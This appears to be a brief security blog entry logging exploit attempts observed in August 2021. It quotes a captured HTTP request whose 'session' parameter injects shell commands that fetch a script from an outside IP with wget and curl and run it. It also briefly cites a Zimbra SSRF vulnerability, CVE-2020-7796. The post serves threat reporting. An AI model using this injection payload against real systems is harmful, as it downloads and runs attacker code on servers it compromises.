neonprimetime security , just trying to help: August 2021

Wednesday, August 18, 2021

Seen August 7th, 2021 exploiting by 155.4.223[.]53

GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolol.sh

https://www.exploit-db.com/exploits/33159

Sample exploit attempt of

"CVE-2020-7796" -> cve.mitre.org/cgi-bin/cvenam "...Potential for SSRF if WebEx zimlet installed and zimlet JSP enabled..." -> wiki.zimbra.com/wiki/Zimbra_Re Vuln Details -> github.com/Zimbra/zm-ziml Seen this week from 103.138.125[.]199 #CVE20207796